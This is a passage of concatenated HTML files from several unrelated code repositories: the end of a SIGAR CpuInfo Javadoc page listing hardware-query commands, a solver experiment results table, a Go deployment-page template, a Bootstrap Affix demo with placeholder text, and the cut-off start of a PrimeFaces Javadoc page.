-v</code><br> <li> Win32: <code></code><br> </ul> <P> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>CPU model</DL> </DD> </DL> <HR> <A NAME="getMhz()"><!-- --></A><H3> getMhz</H3> <PRE> public int <B>getMhz</B>()</PRE> <DL> <DD>Get the CPU speed.<p> Supported Platforms: AIX, FreeBSD, HPUX, Linux, Solaris, Win32. <p> System equivalent commands:<ul> <li> AIX: <code>lsattr -El proc0</code><br> <li> Darwin: <code></code><br> <li> FreeBSD: <code></code><br> <li> HPUX: <code></code><br> <li> Linux: <code>cat /proc/cpuinfo</code><br> <li> Solaris: <code>psrinfo -v</code><br> <li> Win32: <code></code><br> </ul> <P> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>CPU speed</DL> </DD> </DL> <HR> <A NAME="getCacheSize()"><!-- --></A><H3> getCacheSize</H3> <PRE> public long <B>getCacheSize</B>()</PRE> <DL> <DD>Get the CPU cache size.<p> Supported Platforms: AIX, Linux. <p> System equivalent commands:<ul> <li> AIX: <code>lsattr -El proc0</code><br> <li> Darwin: <code></code><br> <li> FreeBSD: <code></code><br> <li> HPUX: <code></code><br> <li> Linux: <code>cat /proc/cpuinfo</code><br> <li> Solaris: <code>psrinfo -v</code><br> <li> Win32: <code></code><br> </ul> <P> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>CPU cache size</DL> </DD> </DL> <HR> <A NAME="getTotalCores()"><!-- --></A><H3> getTotalCores</H3> <PRE> public int <B>getTotalCores</B>()</PRE> <DL> <DD>Get the Total CPU cores (logical).<p> Supported Platforms: Undocumented. <p> System equivalent commands:<ul> <li> AIX: <code>lsattr -El proc0</code><br> <li> Darwin: <code></code><br> <li> FreeBSD: <code></code><br> <li> HPUX: <code></code><br> <li> Linux: <code>cat /proc/cpuinfo</code><br> <li> Solaris: <code>psrinfo -v</code><br> <li> Win32: <code></code><br> </ul> <P> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>Total CPU cores (logical)</DL> </DD> </DL> <HR> <A NAME="getTotalSockets()"><!-- --></A><H3> getTotalSockets</H3> <PRE> public int <B>getTotalSockets</B>()</PRE> <DL> <DD>Get the Total CPU sockets (physical).<p> Supported Platforms: Undocumented. <p> System equivalent commands:<ul> <li> AIX: <code>lsattr -El proc0</code><br> <li> Darwin: <code></code><br> <li> FreeBSD: <code></code><br> <li> HPUX: <code></code><br> <li> Linux: <code>cat /proc/cpuinfo</code><br> <li> Solaris: <code>psrinfo -v</code><br> <li> Win32: <code></code><br> </ul> <P> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>Total CPU sockets (physical)</DL> </DD> </DL> <HR> <A NAME="getCoresPerSocket()"><!-- --></A><H3> getCoresPerSocket</H3> <PRE> public int <B>getCoresPerSocket</B>()</PRE> <DL> <DD>Get the Number of CPU cores per CPU socket.<p> Supported Platforms: Undocumented. <p> System equivalent commands:<ul> <li> AIX: <code>lsattr -El proc0</code><br> <li> Darwin: <code></code><br> <li> FreeBSD: <code></code><br> <li> HPUX: <code></code><br> <li> Linux: <code>cat /proc/cpuinfo</code><br> <li> Solaris: <code>psrinfo -v</code><br> <li> Win32: <code></code><br> </ul> <P> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>Number of CPU cores per CPU socket</DL> </DD> </DL> <HR> <A NAME="toMap()"><!-- --></A><H3> toMap</H3> <PRE> public java.util.Map <B>toMap</B>()</PRE> <DL> <DD><DL> </DL> </DD> <DD><DL> </DL> </DD> </DL> <HR> <A NAME="toString()"><!-- --></A><H3> toString</H3> <PRE> public java.lang.String <B>toString</B>()</PRE> <DL> <DD><DL> <DT><B>Overrides:</B><DD><CODE>toString</CODE> in class <CODE>java.lang.Object</CODE></DL> </DD> <DD><DL> </DL> </DD> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../org/hyperic/sigar/Cpu.html" title="class in org.hyperic.sigar"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../org/hyperic/sigar/CpuPerc.html" title="class in org.hyperic.sigar"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?org/hyperic/sigar/CpuInfo.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="CpuInfo.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_summary">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_summary">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_detail">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_detail">METHOD</A></FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright ? 2004-2009 <a target="_top" href="http://www.hyperic.com/">Hyperic</a>. All Rights Reserved. </BODY> </HTML>
xProj/P.lop/xWork/xPeriment-P.lopT-10-tableau-1901-20150910/xPer-P.lopT-1901-pal-11-35-10-1903-sample.html
fbrglez/gitBed
<!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <table BORDER COLS=16 WIDTH="100%" > <pre> # fileName = xPeriment-P.lopT-10-tableau-1901/xPer-P.lopT-1901-pal-11-35-10-1903-sample.html # created with the command table.html # on Thu Sep 10 23:51:07 EDT 2015 # thisFile = xPeriment-P.lopT-10-tableau-1901/xPer-P.lopT-1901-pal-11-35-10-1903-sample.txt # configuration file = xPeriment-P.lopT-10-tableau-1901.tcl # created on Thu Sep 10 23:51:06 EDT 2015 # </pre> <tr><td>instanceID</td><td>instanceDim</td><td>hostID</td><td>sandboxID</td><td>solverName</td><td>valueTarget</td><td>valueBest</td><td>targetReached</td><td>isCensored</td><td>runtimeLmt</td><td>runtime</td><td>cntProbe</td><td>walkLength</td><td>cntRestart</td><td>speedProbe</td><td>coordBest</td></tr> <tr><td>pal-11-35-1-1903</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00400</td><td>53</td><td>26</td><td>0</td><td>13171</td><td>10,11,4,9,2,3,7,1,5,8,6</td></tr> <tr><td>pal-11-35-2-316410</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00700</td><td>99</td><td>49</td><td>0</td><td>13636</td><td>7,10,2,11,5,3,8,1,6,4,9</td></tr> <tr><td>pal-11-35-3-871546</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00400</td><td>61</td><td>30</td><td>0</td><td>13760</td><td>11,4,9,2,3,7,8,1,5,6,10</td></tr> <tr><td>pal-11-35-4-233105</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00500</td><td>63</td><td>31</td><td>0</td><td>13725</td><td>5,8,9,3,1,2,6,7,10,11,4</td></tr> <tr><td>pal-11-35-5-116105</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00100</td><td>15</td><td>7</td><td>0</td><td>10156</td><td>3,7,5,8,6,11,9,1,10,4,2</td></tr> <tr><td>pal-11-35-6-194892</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00500</td><td>75</td><td>37</td><td>0</td><td>14071</td><td>8,1,4,2,5,6,9,7,10,11,3</td></tr> <tr><td>pal-11-35-7-662606</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00200</td><td>21</td><td>10</td><td>0</td><td>11230</td><td>5,8,9,1,6,10,2,11,3,4,7</td></tr> <tr><td>pal-11-35-8-727650</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.0100</td><td>143</td><td>71</td><td>0</td><td>14785</td><td>6,4,9,10,2,3,7,8,11,1,5</td></tr> <tr><td>pal-11-35-9-471542</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00200</td><td>19</td><td>9</td><td>0</td><td>10976</td><td>7,10,4,8,2,11,5,9,3,1,6</td></tr> <tr><td>pal-11-35-10-591696</td><td>11</td><td>brglez@triangle-Darwin-14.5.0</td><td>P.lop</td><td>P.lopT</td><td>-35.0</td><td>-35</td><td>1</td><td>0</td><td>7200</td><td>0.00200</td><td>25</td><td>12</td><td>0</td><td>11704</td><td>7,1,5,8,6,10,11,4,9,2,3</td></tr> </table> </body> </html>
views/deployment_show.html
KarhuTeam/Karhu
{{template "header" "applications"}} <div class="breadcrumb"> <a href="/">All applications</a> &gt; <a href="/application/show/{{ .application.Name }}">{{ .application.Name }}</a> &gt; Deploy #{{ .deployment.Id.Hex }} </div> </header> <main> <div class="box"> <h2 class="box-title"><span class="state state-{{ .deployment.Status}}"></span> <span class="select">{{ .application.Name }}</span></h2> <ul class="box-list"> <li><span class="box-list-label">Created At :</span> {{ .deployment.CreatedAt.String }}</li> <li><span class="box-list-label">Last Update :</span> {{ .deployment.UpdatedAt.String }}</li> <li><span class="box-list-label">Duration :</span> {{ .deployment.Duration.String }}</li> </ul> </div> <div class="box"> {{ if or (eq .deployment.Status "error") (eq .deployment.Status "done") }} <pre class="stream">{{ .deployment.Logs }}</pre> {{ else }} <div class="stream" data-socket="{{ .websocket_proto }}://{{ .public_host }}/ws/application/deployment/{{ .application.Id.Hex }}/{{ .deployment.Id.Hex }}"></div> {{ end }} </div> </main> {{template "footer"}}
Bootstrap/附加导航.html
youlangu/Study
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Bootstrap 附加导航(Affix)插件</title> <link href="css/bootstrap.min.css" rel="stylesheet"> <script src="jsjquery.min.js"></script> <script src="js/bootstrap.min.js"></script> <style type="text/css"> /* Custom Styles */ ul.nav-tabs{ width: 140px; margin-top: 20px; border-radius: 4px; border: 1px solid #ddd; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.067); } ul.nav-tabs li{ margin: 0; border-top: 1px solid #ddd; } ul.nav-tabs li:first-child{ border-top: none; } ul.nav-tabs li a{ margin: 0; padding: 8px 16px; border-radius: 0; } ul.nav-tabs li.active a, ul.nav-tabs li.active a:hover{ color: #fff; background: #0088cc; border: 1px solid #0088cc; } ul.nav-tabs li:first-child a{ border-radius: 4px 4px 0 0; } ul.nav-tabs li:last-child a{ border-radius: 0 0 4px 4px; } ul.nav-tabs.affix{ top: 30px; /* Set the top position of pinned element */ } </style> </head> <body data-spy="scroll" data-target="#myScrollspy"> <div class="container"> <div class="jumbotron"> <h1>Bootstrap Affix</h1> </div> <div class="row"> <div class="col-xs-3" id="myScrollspy"> <ul class="nav nav-tabs nav-stacked" data-spy="affix" data-offset-top="125"> <li class="active"><a href="#section-1">第一部分</a></li> <li><a href="#section-2">第二部分</a></li> <li><a href="#section-3">第三部分</a></li> <li><a href="#section-4">第四部分</a></li> <li><a href="#section-5">第五部分</a></li> </ul> </div> <div class="col-xs-9"> <h2 id="section-1">第一部分</h2> <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam eu sem tempor, varius quam at, luctus dui. Mauris magna metus, dapibus nec turpis vel, semper malesuada ante. Vestibulum id metus ac nisl bibendum scelerisque non non purus. Suspendisse varius nibh non aliquet sagittis. In tincidunt orci sit amet elementum vestibulum. Vivamus fermentum in arcu in aliquam. Quisque aliquam porta odio in fringilla. Vivamus nisl leo, blandit at bibendum eu, tristique eget risus. Integer aliquet quam ut elit suscipit, id interdum neque porttitor. Integer faucibus ligula.</p> <p>Vestibulum quis quam ut magna consequat faucibus. Pellentesque eget nisi a mi suscipit tincidunt. Ut tempus dictum risus. Pellentesque viverra sagittis quam at mattis. Suspendisse potenti. Aliquam sit amet gravida nibh, facilisis gravida odio. Phasellus auctor velit at lacus blandit, commodo iaculis justo viverra. Etiam vitae est arcu. Mauris vel congue dolor. Aliquam eget mi mi. Fusce quam tortor, commodo ac dui quis, bibendum viverra erat. Maecenas mattis lectus enim, quis tincidunt dui molestie euismod. Curabitur et diam tristique, accumsan nunc eu, hendrerit tellus.</p> <hr> <h2 id="section-2">第二部分</h2> <p>Nullam hendrerit justo non leo aliquet imperdiet. Etiam in sagittis lectus. Suspendisse ultrices placerat accumsan. Mauris quis dapibus orci. In dapibus velit blandit pharetra tincidunt. Quisque non sapien nec lacus condimentum facilisis ut iaculis enim. Sed viverra interdum bibendum. Donec ac sollicitudin dolor. Sed fringilla vitae lacus at rutrum. Phasellus congue vestibulum ligula sed consequat.</p> <p>Vestibulum consectetur scelerisque lacus, ac fermentum lorem convallis sed. Nam odio tortor, dictum quis malesuada at, pellentesque vitae orci. Vivamus elementum, felis eu auctor lobortis, diam velit egestas lacus, quis fermentum metus ante quis urna. Sed at facilisis libero. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vestibulum bibendum blandit dolor. Nunc orci dolor, molestie nec nibh in, hendrerit tincidunt ante. Vivamus sem augue, hendrerit non sapien in, mollis ornare augue.</p> <hr> <h2 id="section-3">第三部分</h2> <p>Integer pulvinar leo id risus pellentesque vestibulum. Sed diam libero, sodales eget sapien vel, porttitor bibendum enim. Donec sed nibh vitae lorem porttitor blandit in nec ante. Pellentesque vitae metus ipsum. Phasellus sed nunc ac sem malesuada condimentum. Etiam in aliquam lectus. Nam vel sapien diam. Donec pharetra id arcu eget blandit. Proin imperdiet mattis augue in porttitor. Quisque tempus enim id lobortis feugiat. Suspendisse tincidunt risus quis dolor fringilla blandit. Ut sed sapien at purus lacinia porttitor. Nullam iaculis, felis a pretium ornare, dolor nisl semper tortor, vel sagittis lacus est consequat eros. Sed id pretium nisl. Curabitur dolor nisl, laoreet vitae aliquam id, tincidunt sit amet mauris.</p> <p>Phasellus vitae suscipit justo. Mauris pharetra feugiat ante id lacinia. Etiam faucibus mauris id tempor egestas. Duis luctus turpis at accumsan tincidunt. Phasellus risus risus, volutpat vel tellus ac, tincidunt fringilla massa. Etiam hendrerit dolor eget ante rutrum adipiscing. Cras interdum ipsum mattis, tempus mauris vel, semper ipsum. Duis sed dolor ut enim lobortis pellentesque ultricies ac ligula. Pellentesque convallis elit nisi, id vulputate ipsum ullamcorper ut. Cras ac pulvinar purus, ac viverra est. Suspendisse potenti. Integer pellentesque neque et elementum tempus. Curabitur bibendum in ligula ut rhoncus.</p> <p>Quisque pharetra velit id velit iaculis pretium. Nullam a justo sed ligula porta semper eu quis enim. Pellentesque pellentesque, metus at facilisis hendrerit, lectus velit facilisis leo, quis volutpat turpis arcu quis enim. Nulla viverra lorem elementum interdum ultricies. Suspendisse accumsan quam nec ante mollis tempus. Morbi vel accumsan diam, eget convallis tellus. Suspendisse potenti.</p> <hr> <h2 id="section-4">第四部分</h2> <p>Suspendisse a orci facilisis, dignissim tortor vitae, ultrices mi. Vestibulum a iaculis lacus. Phasellus vitae convallis ligula, nec volutpat tellus. Vivamus scelerisque mollis nisl, nec vehicula elit egestas a. Sed luctus metus id mi gravida, faucibus convallis neque pretium. Maecenas quis sapien ut leo fringilla tempor vitae sit amet leo. Donec imperdiet tempus placerat. Pellentesque pulvinar ultrices nunc sed ultrices. Morbi vel mi pretium, fermentum lacus et, viverra tellus. Phasellus sodales libero nec dui convallis, sit amet fermentum sapien auctor. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Sed eu elementum nibh, quis varius libero.</p> <p>Vestibulum quis quam ut magna consequat faucibus. Pellentesque eget nisi a mi suscipit tincidunt. Ut tempus dictum risus. Pellentesque viverra sagittis quam at mattis. Suspendisse potenti. Aliquam sit amet gravida nibh, facilisis gravida odio. Phasellus auctor velit at lacus blandit, commodo iaculis justo viverra. Etiam vitae est arcu. Mauris vel congue dolor. Aliquam eget mi mi. Fusce quam tortor, commodo ac dui quis, bibendum viverra erat. Maecenas mattis lectus enim, quis tincidunt dui molestie euismod. Curabitur et diam tristique, accumsan nunc eu, hendrerit tellus.</p> <p>Phasellus fermentum, neque sit amet sodales tempor, enim ante interdum eros, eget luctus ipsum eros ut ligula. Nunc ornare erat quis faucibus molestie. Proin malesuada consequat commodo. Mauris iaculis, eros ut dapibus luctus, massa enim elementum purus, sit amet tristique purus purus nec felis. Morbi vestibulum sapien eget porta pulvinar. Nam at quam diam. Proin rhoncus, felis elementum accumsan dictum, felis nisi vestibulum tellus, et ultrices risus felis in orci. Quisque vestibulum sem nisl, vel congue leo dictum nec. Cras eget est at velit sagittis ullamcorper vel et lectus. In hac habitasse platea dictumst. Etiam interdum iaculis velit, vel sollicitudin lorem feugiat sit amet. Etiam luctus, quam sed sodales aliquam, lorem libero hendrerit urna, faucibus rhoncus massa nibh at felis. Curabitur ac tempus nulla, ut semper erat. Vivamus porta ullamcorper sem, ornare egestas mauris facilisis id.</p> <p>Ut ut risus nisl. Fusce porttitor eros at magna luctus, non congue nulla eleifend. Aenean porttitor feugiat dolor sit amet facilisis. Pellentesque venenatis magna et risus commodo, a commodo turpis gravida. Nam mollis massa dapibus urna aliquet, quis iaculis elit sodales. Sed eget ornare orci, eu malesuada justo. Nunc lacus augue, dictum quis dui id, lacinia congue quam. Nulla sem sem, aliquam nec dolor ac, tempus convallis nunc. Interdum et malesuada fames ac ante ipsum primis in faucibus. Nulla suscipit convallis iaculis. Quisque eget commodo ligula. Praesent leo dui, facilisis quis eleifend in, aliquet vitae nunc. Suspendisse fermentum odio ac massa ultricies pellentesque. Fusce eu suscipit massa.</p> <hr> <h2 id="section-5">第五部分</h2> <p>Nam eget purus nec est consectetur vehicula. Nullam ultrices nisl risus, in viverra libero egestas sit amet. Etiam porttitor dolor non eros pulvinar malesuada. Vestibulum sit amet est mollis nulla tempus aliquet. Praesent luctus hendrerit arcu non laoreet. Morbi consequat placerat magna, ac ornare odio sagittis sed. Donec vitae ullamcorper purus. Vivamus non metus ac justo porta volutpat.</p> <p>Vivamus mattis accumsan erat, vel convallis risus pretium nec. Integer nunc nulla, viverra ut sem non, scelerisque vehicula arcu. Fusce bibendum convallis augue sit amet lobortis. Cras porta urna turpis, sodales lobortis purus adipiscing id. Maecenas ullamcorper, turpis suscipit pellentesque fringilla, massa lacus pulvinar mi, nec dignissim velit arcu eget purus. Nam at dapibus tellus, eget euismod nisl. Ut eget venenatis sapien. Vivamus vulputate varius mauris, vel varius nisl facilisis ac. Nulla aliquet justo a nibh ornare, eu congue neque rutrum.</p> <p>Suspendisse a orci facilisis, dignissim tortor vitae, ultrices mi. Vestibulum a iaculis lacus. Phasellus vitae convallis ligula, nec volutpat tellus. Vivamus scelerisque mollis nisl, nec vehicula elit egestas a. Sed luctus metus id mi gravida, faucibus convallis neque pretium. Maecenas quis sapien ut leo fringilla tempor vitae sit amet leo. Donec imperdiet tempus placerat. Pellentesque pulvinar ultrices nunc sed ultrices. Morbi vel mi pretium, fermentum lacus et, viverra tellus. Phasellus sodales libero nec dui convallis, sit amet fermentum sapien auctor. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Sed eu elementum nibh, quis varius libero.</p> <p>Morbi sed fermentum ipsum. Morbi a orci vulputate tortor ornare blandit a quis orci. Donec aliquam sodales gravida. In ut ullamcorper nisi, ac pretium velit. Vestibulum vitae lectus volutpat, consequat lorem sit amet, pulvinar tellus. In tincidunt vel leo eget pulvinar. Curabitur a eros non lacus malesuada aliquam. Praesent et tempus odio. Integer a quam nunc. In hac habitasse platea dictumst. Aliquam porta nibh nulla, et mattis turpis placerat eget. Pellentesque dui diam, pellentesque vel gravida id, accumsan eu magna. Sed a semper arcu, ut dignissim leo.</p> <p>Sed vitae lobortis diam, id molestie magna. Aliquam consequat ipsum quis est dictum ultrices. Aenean nibh velit, fringilla in diam id, blandit hendrerit lacus. Donec vehicula rutrum tellus eget fermentum. Pellentesque ac erat et arcu ornare tincidunt. Aliquam erat volutpat. Vivamus lobortis urna quis gravida semper. In condimentum, est a faucibus luctus, mi dolor cursus mi, id vehicula arcu risus a nibh. Pellentesque blandit sapien lacus, vel vehicula nunc feugiat sit amet.</p> </div> </div> </div> </body> </html>
UnaCloudWebPortal/lib/primefaces/apidocs/org/primefaces/event/map/class-use/PointSelectEvent.html
UnaCloud/unacloudIaaS1.0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_29) on Tue Feb 14 12:32:37 EET 2012 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> Uses of Class org.primefaces.event.map.PointSelectEvent (primefaces-3.1.1 3.1.1 API) </TITLE> <META NAME="date" CONTENT="2012-02-14"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.primefaces.event.map.PointSelectEvent (primefaces-3.1.1 3.1.1 API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/primefaces/event/map/PointSelectEvent.html" title="class in org.primefaces.event.map"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/primefaces/event/map//class-usePointSelectEvent.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="PointSelectEvent.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>org.primefaces.event.map.PointSelectEvent</B></H2> </CENTER> No usage of org.primefaces.event.map.PointSelectEvent <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/primefaces/event/map/PointSelectEvent.html" title="class in org.primefaces.event.map"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" 